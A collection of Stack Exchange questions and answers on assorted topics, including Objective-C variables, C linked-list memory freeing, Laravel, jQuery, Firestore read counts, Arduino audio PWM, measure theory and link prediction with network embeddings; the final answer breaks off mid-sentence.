Sentinel does not apply here.
common-pile/stackexchange_filtered
The accessor way are different with static int and static NSArray Below this demo code, the logical of the process is not important. @interface ViewController ()<UITableViewDataSource, UITableViewDelegate> @end static int channelIndex = 0; static NSMutableArray *channelsDataArray = nil; @implementation ViewController - (void)getSomething { // Append the desiredValuesDict dictionary to the following array. if (!self.channelsDataArray) { self.channelsDataArray = [[NSMutableArray alloc] initWithObjects: desiredValuesDict, nil]; } else { [self.channelsDataArray addObject:desiredValuesDict]; NSLog(@"channelsDataArray : %@", self.channelsDataArray); } // This will print the result I expected. NSLog(@"channelIndxBefore: %i", channelIndex); ++channelIndex; NSLog(@"channelIndxAfter: %i", channelIndex); } @end The questions I have is that if I call the channelIndex in this way "self.channeIndex++" it will come out a warning: Format specifies type 'int' but the argument has type 'NSInteger *' (aka 'long *') If I call this way "channelIndex++", which will work properly. Strangely, I have another static NSMutableArray channelsDataArray, if I just call [self.channelsDataArray addObject:desiredValuesDict]; It will work properly add object into the var. But if I just use [channelsDataArray addObject:desiredValuesDict]; It will not show any warning, but the channelsDataArray will be nil, and can't assign the desiredValuesDict into it. Question: When should I add self prefix or not? Why they are all static variable but one have to add self, another don't? I'm guessing you have another @interface (in a .h file). Read that and all should become apparent. If not look up the difference between instance and global variables. If still stuck after that edit the question to include the other interface and someone will undoubtedly help you. Of course if there isn't another interface my guess is wrong... @CRD You are totally right! I do have channelsDataArray declare in .h file, and declare a channelDataArray between interface () and implementation. Which is c type global variable. Thanks you so much, you can post your answer below my question, I will upvote you! [Originally a comment:] The error suggests you have another @interface (in a .h file) and that you've declared an instance variable in that file with the same name as the global variable you have declared in the quoted file. You need to remove one of them, which depends on what you need. HTH
common-pile/stackexchange_filtered
Can I implement word prediction with JComboBox I need advice, is there any way to implement with JComboBox word prediction, when I start type I want to open dropdown with all words which start with part what I typed ? Or I need to use some other component, which one ? Please help, I read documentation but I couldn't find what I need. You can take a look at this article: AutoComplete JComboBox or google on autocompletion and JCombobox. There are several libraries that are solving the problem.
common-pile/stackexchange_filtered
Malloc and free in linkedlist recursion function I know that for every malloc there must be a free(), but in case of an existing linkedlist passed in a recursive function to insert a new node inside the linkedlist how would you free that? I'm using valgrind and it shows me that i must free the malloc So my function has as parameters a char * and the pointer to the list passed as **, I did some research and it was needed to be passed like this in order to get the new nodes inserted even tho a pointer only worked well void showDir(char *name, linkedList **list) { DIR *dir; struct dirent *entry; if (!(dir = opendir(name))) return; while ((entry = readdir(dir)) != NULL) { if (entry->d_type == DT_DIR) { char path[1024]; if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0) continue; snprintf(path, sizeof(path), "%s/%s", name, entry->d_name); showDir(path, list); } linkedList *node = malloc(sizeof(linkedList)); if (!node) { printf("Error!"); } node->next = NULL; char filePath[1024]; snprintf(filePath, sizeof(filePath), "%s/%s", name, entry->d_name); node->path = malloc(strlen(filePath) + 1); strcpy(node->path, filePath); if (*list) { int found = 0; for (linkedList *ptr = *list; ptr != NULL; ptr = ptr->next) { if (strcmp(ptr->path, filePath) == 0) { found = 1; } if (ptr->next == NULL && found == 0) { ptr->next = node; break; } } } else { *list = node; } } closedir(dir); } I'm calling the recursive function like this showDir(ptr->path, &list); and freeing it like this linkedList *ptr = list; while (ptr != NULL) { linkedList *next = ptr->next; free(ptr->path); free(ptr); ptr = next; } Of course the list passed in the initial call is already filled up! Thanks for the reading and hope you can help to understand what I'm doing wrong in here! --EDIT ==1914== 64 (24 direct, 40 indirect) bytes in 1 blocks are definitely lost in loss record 2 of 14 ==1914== at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==1914== by 0x10A633: showDir(filestat.c:512) ==1914== by 0x10A629: showDir(filestat.c:510) ==1914== by 0x10A629: showDir(filestat.c:510) ==1914== by 0x109581: main (filestat.c:186) Don't know if that's what you're running into (include the Valgrind report), but it appears that you don't free the newly allocated node if it's found. The function showDir right now does not seem to be calling it self recursively. But to answer your question, unless there's some reallocation going on, you can easily free the list after the function call. You can also free when you do reallocation inside the function. @500-InternalServerError Included the valgrind report. @SASSY_ROG What do you mean with I can easily free the list after the function call? I need the list for later use and can't free it, if i free the node after allocating it and inserting inside the linkedlist it will segment fault. What is the state of list prior to the call showDir(ptr->path, &list);? Amend post and provide a [mcve] Aside: Om success, snprintf(filePath, sizeof(filePath), "%s/%s", name, entry->d_name); returns the length of filePath. No need to call strlen(filePath) in the next line. Better to test that return value too for success. int len = snprintf(filePath, sizeof filePath ,...); if (len < 0 || (unsigned) len >= sizeof filePath) Handle_error(); After your for loop, if found == 1 you might wanna free both node->path and node as they did not get added to the list. Also, as soon as the path is found, you can break out of the for loop, don;t have to check the remainder of the list. Create a tmp pointer. This way as you free them you can still move though the struct. If you don't create a temp pointer to the address of the struct you are losing access to the rest of the nodes. void freeList(struct node* head) { struct node* tmp; while (head != NULL) { tmp = head; head = head->next; free(tmp); } } C: How to free nodes in the linked list? The OP does do this. To free a Linkedlist recursively you can do it as follows: void freeList(struct node* head){ if(head != NULL){ freeList(head->next); free(head); } }
common-pile/stackexchange_filtered
Lebesgue-measurable function problem I am trying to solve this exercise: Let $\phi: \mathbb R \to \mathbb R$ be a measurable function (Lebesgue-measurable) and $f:\mathbb R^2 \to \mathbb R$ defined as $f(x,y)=xy-\phi(y)$. Show the following: a) $f$ is measurable b) If $E \subset \mathbb R$ measurable, then $f^{-1}(E)$ is measurable. This is what I could do: a) If I define $h:\mathbb R^2 \to \mathbb R$ as the projection $h(x,y)=y$, then $h$ is continuous and $\phi(y)=\phi \circ h(x,y)$, if I could prove that $\phi \circ h$ is measurable, then, since $g(x,y)=xy$ is continuous and $f=g+ \phi \circ h$ is sum of measurable functions, $f$ is measurable. I couldn't show that $\phi \circ h$ is measurable, so I am not sure if my approach is the appropiate one. b) If $E$ is measurable, then $E$ can be written as $E=H \setminus Z$ with $H$ a $G_{\delta}$ set and $m(Z)=0$. The preimage is $f^{-1}(H \setminus Z)=f^{-1}(H) \setminus f^{-1}(Z)$. Since $H$ is a borel set, then it is easy to see that $f^{-1}(H)$ is measurable. I am having some difficulty trying to show that $f^{-1}(Z)$ is measurable. Since $m(Z)=0$, there exists $G$ a $G_{\delta}$ set with $Z \subset G$ and $m(G)=m(Z)=0$. The set $G$ can be written as $G=\bigcap_{k \in \mathbb N} G_k$ with $(G_k)_{k \in \mathbb N}$ decreasing, $m(G_k)<\infty$. We have $f^{-1}(Z) \subset f^{-1}(G) \subset f^{-1}(G_k)$ for all $k \in \mathbb N$. I didn't know what to do next. Any suggestions would be greatly appreciated. Thanks in advance. The trick is to show that the inverse image of a set of a set of measure zero is measure zero, (and hence measurable). Let $Z \subset \mathbb R$ be measure zero. Let $\lambda_n$ denote Lebesgue measure on $\mathbb R^n$. $$ m = \lambda_2(\{(x,y):xy-\phi(y) \in Z\}) = \int \lambda_1(\{x:xy-\phi(y) \in Z\}) \, d\lambda_1(y) .$$ Unless $y = 0$ (and $\{0\}$ is a set of measure zero, so can be disregarded) $$ \{x:xy-\phi(y) \in Z\} = \frac 1 y (Z + \phi(y)) ,$$ and so $$ \lambda_1(\{x:xy-\phi(y) \in Z\}) = \frac1{|y|} \lambda_1(Z) = 0.$$ Hence $m = 0$. Hint for (a): If $B$ is a Borel subset of ${\Bbb R}$, then $(\phi\circ h)^{-1}(B) = {\Bbb R}\times\phi^{-1}(B)$, and $\phi^{-1}(B)$ is a (Lebesgue) measurable set because $\phi$ is assumed to be Lebesgue measurable. Thanks for the hint!, could you help me with part b)?, basically, what I would like to prove is that if I have a $G_{\delta}$ set $H$ of measure zero, then $f^{-1}(H)$ is measurable, or maybe you have an alternative solution.
common-pile/stackexchange_filtered
Run button missing in my jenkins blue ocean pipeline Here is my jenkinsfile: pipeline { agent any options { skipDefaultCheckout() } parameters { choice( name: 'MyParam', choices: 'One\nTwo\nThree', description: 'slkfjlsdfjlsdjflksdjf') } stages { stage('Checkout') { steps { echo '========= Checkout stage ==========' deleteDir() checkout scm } } stage('Build') { steps { echo '========= Build stage ==========' } } stage('Deploy') { steps { echo '========= Deploy stage ==========' } } } } So I create a new pipeline with it but I don't see a run button: But if I create a regular jenkins job in the old GUI and then view it in blue ocean I DO see the run button: Or maybe Im misunderstanding how pipelines work. When I create a new pipeline from blue ocean it looks like its creating a "multi branch" pipeline. Perhaps this kind of pipeline doesn't have a parameter choice?? it looks like you clicked on the master branch for that build plan. for me, there is no run button on that screen. but if you click on "Branches" then there is a run button off to right for each branch (and it lets me select parameters as appropriate after i click the "play button" there). and i don't think this is your issue (since you said there is a run button for other build plans), but for anyone else that comes through here, make sure you're signed in, since your jenkins instance may have anonymous builds disabled. What happens when I create a new pipeline from blue ocean is it indexes and runs a build immediately, I guess defaulting to the first choice. And after it creating it I don't see a Run button. Seems broken? My jenkinsfile is correct, not sure what is happening never mind your right. The run button is on the branches page. It seems for job there is a Run button on the main page because, duh, there is only one thing to run. you got a run button for all pipelines that are not multibranch, if it is multibranch pipeline, to which branch, PR, tag will that button point to? https://github.com/jenkinsci/blueocean-plugin/blob/88e79617ace615649646f015aa7d09dc9aa99ec1/blueocean-dashboard/src/main/js/components/Activity.jsx#L117 The run button is on the branches page and it's hidden. It shows on mouse over. Not really the best ux ever..
common-pile/stackexchange_filtered
is there way to simply convert JSON Array values to string in javascript I have json array data for people name like this. 'user': [{'name':'tom'}, {'name':'jerry'}] I want to convert user array to string value like this "tom, jerry" please, let me know how can I convert. You can try this var user = [{'name':'tom'}, {'name':'jerry'}] console.log(user.map(function(item){return item.name;}).join(", ")); .join(", ") would respect the exact syntax OP asked for.
common-pile/stackexchange_filtered
Laravel Eloquent many-to-many attach I am new to laravel, and trying to build a photo album with it. My problem is that i use the attach function to insert the user id and group id to my database, it works okay, but in the documentation it says this about the attach function For example, perhaps the role you wish to attach to the user already exists. Just use the attach method: So i wanted to use it the same way, if the album_id already exist just update it, other wise insert thr new one, but my problem is it always insters, it does not checks if the album_id already exsits My model class User extends Eloquent { public static $timestamps = false; public function album() { return $this->has_many_and_belongs_to('album', 'users_album'); } } Post function public function post_albums() { $user = User::find($this->id); $album_id = Input::get('album'); $path = 'addons/uploads/albums/'.$this->id.'/'. $album_id . '/'; $folders = array('path' => $path, 'small' => $path. 'small/', 'medium' => $path. 'medium/', ); if (! is_dir($path) ) { foreach ($folders as $folder) { @mkdir($folder, 0, true); } } $sizes = array( array(50 , 50 , 'crop', $folders['small'], 90 ), array(164 , 200 , 'crop', $folders['medium'], 90 ), ); $upload = Multup::open('photos', 'image|max:3000|mimes:jpg,gif,png', $path) ->sizes( $sizes ) ->upload(); if($upload) { $user->album()->attach($album_id); return Redirect::back(); } else { // error show message remove folder } } Could please someone point out what im doing wrong? Or i totally misunderstod the attach function? By the way: http://area51.stackexchange.com/proposals/46607/laravel what about the link you posted? Just a link to the Laravel Stack Exchange proposal, for those who are interested in Laravel. Thanks @Collin i noticed i misunderstand i made my check yesterday $album = $user->album()->where_album_id($album_id)->get(); if(empty($album)) { $user->album()->attach($album_id); } I believe you have misunderstood the attach function. The sync function uses attach to add relationships but only if the relationship doesn't already exist. Following what was done there, i'd suggest pulling a list of id's then only inserting if it doesn't already exist in the list. $current = $user->album()->lists( 'album_id' ); if ( !in_array( $album_id, $current ) ) { $user->album()->attach( $album_id ); } On a side note I'm going to suggest that you follow the default naming convention from laravel. The relationship method should be $user->albums() because there are many of them. The pivot table should also be named 'album_user'. You will thank yourself later. Contains method of Laravel Collections The laravel collections provides a very useful method 'contains'. It determine if a key exists in the collection. You can get the collection in your case using $user->album. You can note the difference that album is without paranthesis. Working code Now all you had to do is use the contains method. The full code will be. if (!$user->album->contains($album_id) { $user->album()->attach($album_id); } Its more cleaner and 'Laravel' way of getting the required solution. This is handy, but does seem wasteful having to pull the full details of all albums for the user from the database. You only want to know whether a specific album belongs to that user.
common-pile/stackexchange_filtered
jQuery.html() insert input field won't work in IE11 I have a problem regarding jQuery's .html method. I am using the following event to insert a input field in a table row when double clicking on it. Everything works fine in Google Chrome and Firefox - but it won't work in Internet Explorer 11. The code is the following: $(document).on('dblclick', '.myTable tbody tr td:not(:first-child)', function () { var originContent = this.innerText; $(this).html('<input type="text" value="' + originContent + '">') $(this).children().focus(); }); I also tried it with the following way to insert the input field: $(this).html($('<input />', { type: "text", value: originContent })); But it won't work. There is no error in the IE11 console - it just don't replaces the innerHTML. But notice: if I try to replace the inner html in the debug session with a number or string like .html(1234) or .html('string') it works. What am I doing wrong? Anyone else noticed a problem like that? Can you give more details than 'it doesn't work'. What happens? What doesn't happen? Any errors in the console? Have you made any effort to debug this at all - if so, what? Why are you using html() and not append() ? Sorry for the missing information - I also included it to the original post. Well, no error appears in console. It just not replace the html content of the table row. As I tested it it works if I replace it with just a string or so like .html(1234) or .html('string') @epascarello I'd imagine it's some sort of span or paragraph that, when double-clicked, becomes an editable input. Not that this rules out append() by any means, but that would require the deletion of the previous content as well - html() can of course just do it in one swoop. Perhaps there's a reason to use .append() here that I haven't considered? Indeed @TylerRoper the row includes a text string with the original content which can be edited after double clicked. So empty() and append() Well it seems like that the concatenating is the problem...manually appending while debugging is working like $(this).empty().append(''); Seems to work just fine in IE: http://jsbin.com/fuseluguvi/1/edit Please provide a Minimal Verifiable Complete Example that actually demonstrates the issue. Otherwise, all the rest of us can do is wildly guess what the problem is. @erfurtjohn Does the value contain any quotation characters or angle brackets perhaps? This is why you shouldn't be using string concatenation to build HTML. @JLRishe it just contains a float number like 3,1234 or 3.213 Are you sure jQuery is loading for you in IE11? I just tried to create an MCVE for this and it didn't work, telling me that $ was not defined. After adding the meta tag described at this answer, your code dropped in the text field as desired. I'll write up the sample code as an answer if that turns out to be your issue. Possible duplicate of My jQuery is not working with IE11 jQuery is working at all, but not my html appending with value. I tried again and appending just the element without a value like is working! But if I try to set value after appending with .val() it doesnt work again....very weird! I also noticed, that jQuery indeed appends it because I can see the element listed in $(this).children() after appending with the value! But it doesn't appear on screen. I don't know why und how but apparently the $(this).children().focus(); crashed it or prevent showing it up in IE.... Edit: the error was procudes due an wrong event I handled. My first event reacted on double click on table row - after appending the html input field I changed the focus to the input element. But my second event handler should've react on focus out of the input element but I missed a input in the selector. So everytime I clicked on the table row I inserted the input and removed it coincident. Why it works then in Chrome is still weird, guess it just knows what I want ¯_(ツ)_/¯
common-pile/stackexchange_filtered
Need help identifying a set of Japanese bench chisels I ran across an auction of a set of Japanese bench chisels, and there wasn't a lot of info provided (and yes I bid because I'm an easy mark), so I'm trying to gather some details from the photos. The only visible markings are stamped on the chisel itself, and I'm wondering if anyone knows anything about it or has suggestions on where to look for further details. Here's a zoomed version of the stamped markings with some photo sharpening: I've sent a note to the auction house for more photos of the storage box or any other identifying info, but I haven't heard back. Thanks for taking a look! Might be better off asking in the Japanese Language stack for an English spelling of the name on the maker's mark. https://japanese.stackexchange.com/ @UnhandledExcepSean Great minds! I already started writing up a post. Thanks! Hi, welcome to SE. I think the Japanese stack might not be as good a place to ask as one might think, given the specialist nature of the subject (you might get a translation but without context, which is effectively useless). "or has suggestions on where to look for further details" I think your best bet is going to be to ask among aficionados of Japanese chisels, and one of the woodworking forums will be a good place to start. Try SawMillCreek first and if there's nobody there who can help directly you might still get a pointer to a better venue. "Here's a zoomed version of the faded markings with some sharpening" Two things I wanted to note re. this sentence. The first is if you re-ask the question elsewhere be sure to say you sharpened the photo. Because of the context I was initially very confused as this portion of the chisel is of course not involved in the sharpening process :-) Second is the markings aren't faded. Virtually no amount of use could actually wear away stamps on steel (even if it is much softer than the steel at the cutting edge). These are just faint and/or partial stamps, which is surprisingly common. Thanks @Graphus - good suggestions, refinements made. Thanks to your Japanese Learning stack question, I was able to find the manufacturer. Nagahiro is the English translation according to Google. Your image rotated Partial image from a seller Seems like a match to me; the seller site also seems to refer to is as Osahiro (Nagahiro). From what I can determine, Osahiro is the brand, but Nagahiro is the blacksmith and a well known one at that. Hah - I checked that question a few minutes ago (before coming checking here) -- And came up with the exact same results (even the same seller of new-old-stock chisels in a similar red velvet box). Perfect. Thanks for the follow up and the earned check mark.
common-pile/stackexchange_filtered
How do you convert PCM to PWM? I'm a beginner and I've been developing my own library for a wave player. so far I have the SD card installed and OLED and rotary encoder all connected. I've successfully read the wave chunk and it's data(16bit and 44.1KHz). My question is that the data in wave file is PCM and I wish to play is using 16bit PWM and so how do I convert PCM to PWM? http://playground.arduino.cc/Code/PCMAudio An Arduino is not an audio player. It won't have enough processing power and/or memry for running an SD card, refreshing an OLED display and playing audio. Use specialized hardware and a decent DAC for audio playback. Or go the cheap route and use an LC filter. This video has good info on both DACs (R2R-style) and PWM+Filter "DACs": https://www.youtube.com/watch?v=Y2OPnrgb0pY What's your speaker system? You might need another OpAmp or audio amplifier. tttapa, I've seen a lot of tutorials online. Maybe if I remove the OLED display it might be able to run it but I'm just curious and I want to get to the end of it even if the output isn't want I desire. Maximilian Gerhardt, LC filter makes sense after I've generated PWM signal. My whole problem is that I'm not able to do that. I just don't know what the interface between PCM WAVE file and PWM is. There is no such thing as a PCM file. PCM is completely erroneously used to describe an uncompressed digital audio file. What it actually means is "A file which contains data that can be fed directly to a PCM device without any form of intermediate conversion". What you have in a "PCM" WAV file is just raw sample data. After your header (usually 44 bytes) you just have 16-bit values representing your sample points, with the two channels interleaved one after the other. Since PCM is a linear audio representation, the sample data it expects is a simple linear representation of the audio (unlike µLaw or A-law) and with no compression (such as MP3 or FLAC). And that is the exact same data that PWM expects since it too is a simple linear output. However, none of that matters, because the Arduino simply isn't powerful enough to play your file. Maybe a smaller one (8kHz, mono, 8-bit) would be playable, but not yours. The numbers just don't add up. There is a PCMAudio example available, but it only works from audio embedded within your program. There is also a TMRpcm library available which plays from SD card, but is limited to 8-bit mono, though it can supposedly do up to 32kHz sample rate (though I wouldn't want to try doing anything else at all at that rate). You would be better off using a system more geared towards audio - something with an I2S CODEC chip attached would be the best solution. Thanks for replying early. Well I was thinking if we can use 16bit PWM for audio output at 44KHz timer interrupt. And to compensate for the low memory holding capacity of the Arduino we can use double buffering from an SD card. OR Adding an external 16bit DAC IC would reduce the complexity because then maybe I don't have to worry about PWM? (I'm not sure about this part.) See my answer below. PCM can most certainly be converted to PWM and played on most MCUs. You should use an MCU with PWM generators to do that. The problem with PWM is that the max resolution is quite low (10-bit) so you are effectively limited to 8-bit PCM. Use a DSP editor like Audacity to export a 16KHz unsigned 8-bit WAV. Import the WAV file as an array of unsigned char. Set your PWM freq to the resonant freq of your speaker (eg. 31250Hz) Set your PWM timer to fire at 16KHz and set the PWM duty cycle to the next array value. I use 16KHz sample rate because: Reduced memory footprint Fewer timer interrupts PWM's limited resolution does not seem to benefit from anything above 16KHz I use piezo speakers directly wired to PWM pins in H-bridge. A separate amp module might benefit from higher sample rates. Comments have been moved to chat; please do not continue the discussion here. Before posting a comment below this one, please review the purposes of comments. Comments that do not request clarification or suggest improvements usually belong as an answer, on [meta], or in [chat]. Comments continuing discussion may be removed.
common-pile/stackexchange_filtered
iPhone custom font with text border/shadow I'm using Zynga's FontLabel to use a custom font in my iPhone project. Is there a way to add a text border and shadow using this? If you mean around the entire label, this FontLabel class appears to just be a subclass of UILabel which has the following properties: @property(nonatomic,retain) UIColor *shadowColor; @property(nonatomic) CGSize shadowOffset; to control shadows. Furthermore, UILabel is a subclass of UIView, each of which is backed by a CALayer, which has the following properties that allow you to apply a border to any CALayer: @property CGFloat borderWidth; @property CGColorRef borderColor; You should be able to set these properties on the object returned by your UILabel's layer property. If you were looking for "outlined text" you need to look for a font that encapsulates that behavior. I don't think the kit can just "figure that one out" for you. HTH.
common-pile/stackexchange_filtered
Display temporary data client-side within table Please refer to this image, so I can explain the issue better. I have Master/Detail form (Bill of Materials in this case), which stores data in 2 database tables. The top of the form (Product,Quantity) is stored in the Master table, and with the inserted id(as FK), the Details table is populated with as many components and quantity entered below. But, until the final SAVE(submit) is pressed, I'm storing the component ID (value from the dropdown) and the quantity (from the input field) into JavaScript object within array: var products = []; $("#add").click(function(){ var prodname_fk = $("select").val(); var prodname = $("select option:selected").text(); var quantity = $("#quantity").val(); //Checks if the product or quantity has not been selected if (quantity == '' || prodname_fk == '') { alert("Please select product and quantity!"); return false; } //Pushes the Objects(products [id,quantity,prodname,uom]) into the Array products.push({id:prodname_fk,prodname:prodname,quantity:quantity}); //Test Purpose CONSOLE output var i = 0; $.each(products, function(){ console.log(products[i].id + " --> " + products[i].prodname + " --> " + products[i].quantity); i++; }); //Emptys the product and quantity $("select").val(""); $("#quantity").val(""); }); I also get the product name (text from the dropbox) for displaying purposes in the table below. So, my question is: How can I output the Component and Quantity in the table where it says "No Records!", after each ADD is pressed? (ADD does not submit or refresh the page) How can I add "delete" function in the same table for each object from the array? How can I check if a component exists already in the array, and just add up the quantity? This is my form: Thank you very much in advance! p.s. I'm trying to achieve something like this: How to store temporary data at the client-side and then send it to the server Oh, I forgot to note, I'm using PHP(Codeigniter)/MySQL. Thats ok so you could give the url of the PHP file that will process the data and insert to the dataabase table and then you could return the table to display from the PHP page... To add the values to your table, look at $.append() and $.appendTo(). Create your new row via $("<tr />") and append it to your table with $.appendTo(): var newRow = $("<tr />").appendTo("#myTable"); You now have a reference to the new row, so you can now append the cells: var newRow = $("<tr productId=\"" + prodname_fk + "\" />") .appendTo("#myTable") .append("<td class=\"code\" />") .append("<td class=\"component\">" + prodname + "</td>") .append("<td class=\"quantity\">" + quantity + "</td>") .append("<td class=\"uom\" />") .append("<td><span class="deleteButton">delete</span></td>"); Delete the row like this: $("#myTable .deleteButton").click(function(e) { $(this).closest("tr").remove(); }); To handle storing the data I'd use an object rather than an array: var products = {}; $("#add").click(function() { ... if (prodname_fk in products) { products[prodname_fk].quantity += quantity; $("#myTable tr[productId='" + prodname_fk + "'] .quantity").text(products[prodname_fk].quantity) } else { products[prodname_fk] = { prodname:prodname, quantity:quantity }; var newRow = $("<tr productId=\"" + prodname_fk + "\" />") ... // append to table and append cells $(".delete", newRow).click(function(e) { delete products[$(this).closest("tr").attr("productId")]; $(this).closest("tr").remove(); }); } ... }); Untested, so please forgive typos. The concepts are correct. Since you tagged it with Ajax here is how you make a ajax call and return the processed data You need to make an XML Http request to the Servlet for that you need to make a XML Http object in the javascript in your HTML page var myxmlhttpobj=new GetXmlHttpObject(); function GetXmlHttpObject() { if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); } if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); } return null; } Now you need to make a request to the Server from the javascript var url="urlofPHPpage"; var para="parmeter1=prodname_fk&parameter2=prodname&parameter3=quantity; myxmlhttpobj.open("POST",url,true); myxmlhttpobj.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); myxmlhttpobj.setRequestHeader("Content-length", para.length); myxmlhttpobj.setRequestHeader("Connection", "close"); myxmlhttpobj.onreadystatechange=ajaxComplete; myxmlhttpobj.send(para); At the server you need to process the result and sent it back as string: Process the input and prepare the table of contents added and sent it back Write the out put in form of string When the request comes back the myxmlhttpobj.onreadystatechange=ajaxComplete; will be called function ajaxComplete(){ if(myxmlhttpobj.readyState==4){ ///Display the result on the HTML Page } } That should help... Also have a look at jQuery Ajax API. one possible way is to put your temp data in hidden fields beside the normal visible fields, like that you can get these hidden fields values easily using javascript and send to the server, and also because hidden fields are input tags, if you submit a form you can get the values from the server side as any other input tag. assuming you want to display this in html table with thead and tbody components you can write something like this inside click event of your add method $('<tr>').append($('<td>').text(prodname)) .append($('<td>').text(quantity)) .append($('<td>').append($('<button>').text('Delete').addClass('Delete').attr('id', CurrentIDHere))) .appendTo('tbody'); you can place this code inside click event of add button after your validation logic. you can add a click handler for delete class where you get id of the detail section and delete corresponding entry from your array. code is untested though .append() returns the original jQuery object, not a reference to the newly created object. http://jsfiddle.net/gilly3/FYdCC/. You'll need to refactor a little to make that work. yeah i m just testing it. will update the answer after a while try like this: .append($('<td>').text(prodname))
common-pile/stackexchange_filtered
Replace each match with certain value using Notepad++ in one regular expression I have the following code in Adobe LiveCycle Designer FormCalc: if (form1.subform[0].complete_flag.rawValue == "1") then $.presence = "invisible"; endif I want to use N++ find/replace with regular expression or similar to replace the above code to look like (to convert to JavaScript): if (form1.subform[0].complete_flag.rawValue == "1") { this.presence = "invisible"; } basically, in one run of find/replace, substitute the following: then ==> { $. ==> this. endif ==> } Is this possible using N++ or similar tools? Tarek The regex: (then)|(\$)|(endif) The replace:(?1{)(?2this)(?3}) This will work in Notepad++. A full explanation can be found here, but if that gets unlinked, the gist of it is this: The search looks for either of three alternatives separated by the |. Each alternative has ist own capture brackets. The replace uses the conditional form ?Ntrue-expression:false-expression where N is decimal digit, the clause checks whether capture expression N matches. -AdrianHHH OMG! Thanks. It worked. I searched for this extensively and I didn't find it. Why there is a sad face next to your name above? That's my profile picture, in the same way that you have a picture of yourself next to your name in the question (and for any answers you post). Oh, OK. I just thought that this is related to some progress in this website. How I can find and delete comment lines (single line comment using //)? I want to delete the entire line (remove it). The regex would be //.*, and you'd replace it with a blank string. I'd suggest you consider not deleting comments, though.
common-pile/stackexchange_filtered
Firestore read data count does not match documents queries count I have encountered some issue when trying to figure out and calculate the firestore read count. The firestore read count is always surging up at a very high rate (100 counts increment every time I reload the page) even though there are only around 15 users documents. Even when I am not reloading the page, the firestore read count would go up itself, is this due to the subscribe behaviour that cause the read data action refreshing from time to time? (I have read some articles recommend to use "once" if user want to extract data just once). Bellow is the code snippet (ts): // All buddy users from Firebase private usersCollection: AngularFirestoreCollection<Profile>; users: Observable<Profile[]>; usersFirebase: Profile[] = []; getUserDataFromFirebase() { this.isImageLoading = false; this.users.subscribe(async results => { var ref; for(let result of results) { if(result.imageName) { ref = this.store.ref('images/' + result.userId + '/profiles/' + result.imageName); } else { // Get default image is image not existing ref = this.store.ref('images/ironman.jpg'); } await ref.getDownloadURL().toPromise().then(urlString => { result.profileURL = urlString; // Change availibility date from timestamp to date format try { result.availability = this.datePipe.transform(result.availability.toDate(), 'yyyy-MM-dd'); } catch (error) {} result.flip = 'inactive'; if(result.identity == 'Tenant') { this.usersFirebase.push(result); } return new Promise((resolve, reject) => { resolve(); }) }); } console.log(this.usersFirebase); }); } How does the firestore read count works, is the count increment based on document queries, will it continue to query itself after a certain amount of time? Firestore read count increases more than users documents The first thing to keep in mind is that any documents shown in the Firestore console also count towards your reads, so you'll want to close the console during these tests. The reads counts are focused on the number of documents retrieved. Lets set these 4 scenarios: A collection of 10 users, you run a collection("users").get() call: you will get back 10 employee documents, and be charged for 10 reads. A collection of 10,000 users, you run a collection("users").get() call: you will get back 10,000 users, and be charged for 10,000 reads. A collection of 10,000 employees, you run a collection("users").get().limit(10) call: you will get back 10 users, and be charged for 10 reads. A collection of 10,000 users, 15 of which are named "Carl" and you run a collection("users").where("first_name", "==", "Carl") call, you will get back 4 users and be charged for 15 reads. On the other hand, if you are listening to the whole collection users (no where() or .orderBy() clauses) and you have an active onSnapshot() listener then you will be charged for a document read operation each time a new document is added, changed, or deleted in the collection users. You might want to take a look into your workflow to check whether other process are making changes on your collection when checking the read operations. Finally, something to keep in mind is that the read ops in your report might not match with the billing and quota usage. There is a feature requests in the Public Issue Tracker realted to this inquiry - reads on Firestore: here. You can "star" it and set the notifications to get updates on them. Also, you can create a new one if necessary.
common-pile/stackexchange_filtered
How does the Amazon Prime Gaming rewards system work? I was wondering, whenever I log into Twitch, I see the notifications of past Amazon Prime Gaming rewards and most of them have a claim button. Since I have never bought the subscription, I wanted to know if I bought the subscription will I be able to claim these past rewards (or expired rewards?) or the claim button is a bug or an error that never got fixed? Every reward has a window you can claim it in. When the window passes you cannot get the reward anymore. If it has a claim button that window has not passed, and you can claim it while you have an active subscription. Once you claimed the items, you do not need the subscription to keep the items. You can see the status of all your claimable rewards at: https://gaming.amazon.com Old rewards whose windows have passed are removed from the list and are not visible. Ok, thanks for the question, I will mark it once i get the subscription. also another matter, my related amazon account has been banned and closed and requires contacting support for further access, but my twitch account still works without any problems so far, is it safe to buy the subscription without intending to verify my amazon account via support? will the subscription be available via twitch only? @Hitman2847 You'll almost certainly need an active Amazon account. You purchase a Prime subscription - which Prime Gaming is one of the benefits of - for your Amazon account, and then you can (optionally) link your Twitch and Amazon accounts to get the very few additional Twitch-specific benefits. All of the other benefits of Prime Gaming are available without having a Twitch account. ah, got it , so no way of getting it without verifying my account
common-pile/stackexchange_filtered
Link prediction on network embeddings A picture is worth a thousand words, so I decided to illustrate how I imagine the procedure of link prediction on network embeddings. In the figure below the LR model stands for the "Logistic regression model". Train and test networks are composed of an equal number of positive and negative edges (training examples). My question is: should I learn embeddings on a network defined by positive edges only or should I also consider negative edges in the network embedding process? Any idea is appreciated. May be related: https://docs.ampligraph.org/en/1.2.0/ The short answer is: You are correct, in order to compute node embeddings you only need the "true" train edges. These edges span a training graph which is the input we give NE methods to learn the node embeddings. Non-edges are only used in the binary classification problem. The longer answer is: The most effective way to compute link predictions from embeddings is via binary classification. The node embeddings first need to be transformed into edge embeddings (e.g. averaging the embeddings of i and j to get the embedding of e=(i,j)) and then solve a binary classification problem. The binary classifier (usually Logistic regression) will take the edge embeddings as examples and try to learn a mapping to their corresponding "label" where these labels are 1 for the "true" edges and 0 for the non-edges. Therefore, in addition to the edge embeddings of "true" graph edges, we need to compute the edge embeddings of a set of non-edges in the graphs (those with label 0). This is what we usually refer to when we talk about negative sampling for LP. I believe the confusion here comes from the way some popular NE algorithms compute the embeddings. For instance, methods base on matrix factorization directly take the train graph you give as input, compute the adjacency matrix, factorize it and return the node embeddings. Other methods e.g. Deepwalk, Node2vec or LINE have a special way of learning embeddings (Skip-gram from work embedding literature) and require "negative sampling" in the embedding learning process itself. These methods will select, from that train graph you give them, a set of 